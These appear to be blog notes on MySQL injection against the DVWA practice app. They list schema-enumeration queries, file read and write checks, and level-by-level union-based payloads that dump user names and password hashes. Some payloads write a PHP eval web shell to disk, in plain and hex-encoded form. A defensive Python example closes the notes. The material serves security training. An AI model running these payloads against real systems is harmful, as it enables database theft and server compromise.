Date: 2019-07-23 19:55:59
update:
Author: Bay0net
Description: MySQL injection notes
0x01, Basic information
Basic terms
- Database: a collection of related tables.
- Table: a matrix of data; inside a database, a table looks like a simple spreadsheet.
- Column: one column (data element) holds data of the same type, such as a zip code.
- Row: one row (tuple or record) is a group of related data, such as one user's subscription record.
- Primary key: the primary key is unique, and a table can contain only one primary key. You can use the primary key to query the data.
- Foreign key: a foreign key is used to associate two tables.
Common Commands
# Log in (-p alone prompts for the password; "-p root" with a space would be read as the database name "root")
mysql -h 127.0.0.1 -u root -p
0x02, MySQL commands
Dumping database names, table names and column names
Each MySQL instance has a separate information_schema database that stores the basic information about all the other databases in that instance.
# Dump the database names
select group_concat(SCHEMA_NAME) from information_schema.schemata;
# Dump the table names of the current database
select group_concat(table_name) from information_schema.tables where table_schema=database();
# Dump the column names (the table name is users; either quote it or hex-encode it)
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;
# Dump the column contents
select first_name,password from users;
Checking MySQL file read and write permissions
Using MySQL's file read and write functions requires certain privileges. The secure_file_priv parameter restricts the directory in which load_file, INTO OUTFILE and related functions are allowed to read and write.
# How to check it
show global variables like '%secure%';
# Meaning of the values
When secure_file_priv is NULL, mysqld is not allowed to import or export at all.
When secure_file_priv is /tmp/, mysqld may only import and export within the /tmp/ directory.
When secure_file_priv is /, mysqld may import and export across the entire disk it resides on.
When secure_file_priv has no value, there is no restriction on mysqld's import and export.
File operations
# Read a file
select load_file('//tmp//key');
# Write a file (requires the privilege and knowledge of the absolute path)
select 'hello' into outfile '/tmp/test01';
Filter functions
In PHP < 5.4 there is a magic_quotes_gpc configuration item; when magic_quotes is on, all single quotes, double quotes, backslashes and NUL bytes are automatically escaped with a backslash. In PHP 5.4 and later this method can no longer be used for escaping.
mysql_real_escape_string() is also used to escape special characters, but this extension was deprecated in PHP 5.5 and removed in PHP 7.
PHP: mysqli::real_escape_string - Manual
0x03, SQL Injection (DVWA)
Low Security Level
# Test whether the parameter is injectable
?id=1' or '1'='1
?id=1' or '1'='2
# Determine the column count (2 returns normally, 3 errors)
?id=1' order by 2 --
?id=1' order by 3 --
# Find which columns are echoed back
?id=1' union select 111,222 --
# User name and database name
?id=1' union select user(),database() --
-- output: admin@localhost, dvwa
# Current user and MySQL version
?id=1' union select current_user(),version() --
-- output: First name: admin@%, 5.5.47-0ubuntu0.14.04.1
# Dump the table names
?id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema =database() --
-- output: guestbook,users
# Dump the column names (two methods: quote the name or hex-encode it)
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name =0x7573657273 --
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' --
-- output: user_id,first_name,last_name,user,password,avatar,last_login,failed_login
# Dump the column contents
?id=1' union select group_concat(user_id,first_name,last_name),group_concat(password) from users --
?id=1' union select null,concat_ws(char(32,58,32),user,password) from users --
?id=1' union select user,password from users --
-- output: admin/5f4dcc3b5aa765d61d8327deb882cf99
# Read a file
?id=1' union select 1,load_file('//tmp//key') --
# Write a file
?id=1' and '1'='2' union select null,'hello' into outfile '/tmp/test01' --
?id=999' union select null,'hello' into outfile '/tmp/test02' --
?id=999' union select null,'<?php @eval($_POST["gg"]); ?>' into outfile '/tmp/test03' --
?id=999' union select 1,0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E into outfile '//tmp//test04' --
Medium Security Level
The mysqli_real_escape_string function is used to escape special characters, and the front-end page uses a drop-down selection form in an attempt to control the user's input. The injection here is numeric, so the filtering of special characters matters little; just send the POST request with HackBar.
# Find the injection point
id=1 and 1=1 &Submit=Submit
id=1 and 1=2 &Submit=Submit
# Dump the data
id=1 union select user,password from users&Submit=Submit
High Security Level
A LIMIT 1 is added here to restrict the output, but it can simply be commented out; the approach is the same as for the Low Security Level.
Impossible Security Level
PDO is used to separate code from data, which effectively prevents SQL injection. In addition, the output is produced only when the query returns exactly one row, which effectively prevents dumping the database ("tuoku"). An Anti-CSRF token mechanism is also added to further improve security.
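As an added example (not from these notes and not DVWA's own code), the two ends of the DVWA ladder side by side: the Low level's query built by string concatenation, and an Impossible-style lookup that validates the id, binds it as a parameter and only answers when exactly one row comes back. SQLite stands in for MySQL so it runs offline; the users table, its second row and the function names are constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for DVWA's users table (SQLite instead of MySQL;
# the column names follow the notes, the second row's hash is a made-up placeholder).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
                 "user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "Test", "User", "test", "PLACEHOLDER_HASH_NOT_REAL"),
    ])
    return conn

def lookup_low(conn, user_id):
    """Low level: the id is pasted into the SQL text, so a quote inside it ends the
    string literal and whatever follows is parsed as SQL. Returns every matching row."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_impossible(conn, user_id):
    """Impossible level as the notes describe it: reject a non-numeric id up front,
    bind the value as a query parameter (code and data stay separate), and return a
    row only when exactly one came back. Returns None in every other case."""
    if not user_id.isdigit():
        return None
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1",
        (int(user_id),),
    ).fetchall()
    return rows[0] if len(rows) == 1 else None

if __name__ == "__main__":
    db = make_db()
    print(lookup_low(db, "1"))                    # [('admin', 'admin')]
    print(lookup_low(db, "1' or '1'='1"))         # both rows: the quote broke out of the literal
    print(lookup_impossible(db, "1"))             # ('admin', 'admin')
    print(lookup_impossible(db, "1' or '1'='1"))  # None: rejected before any SQL runs
```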
DVWA SQL Injection clearance Tutorials | AnCoLin's Blog | wind shadow blog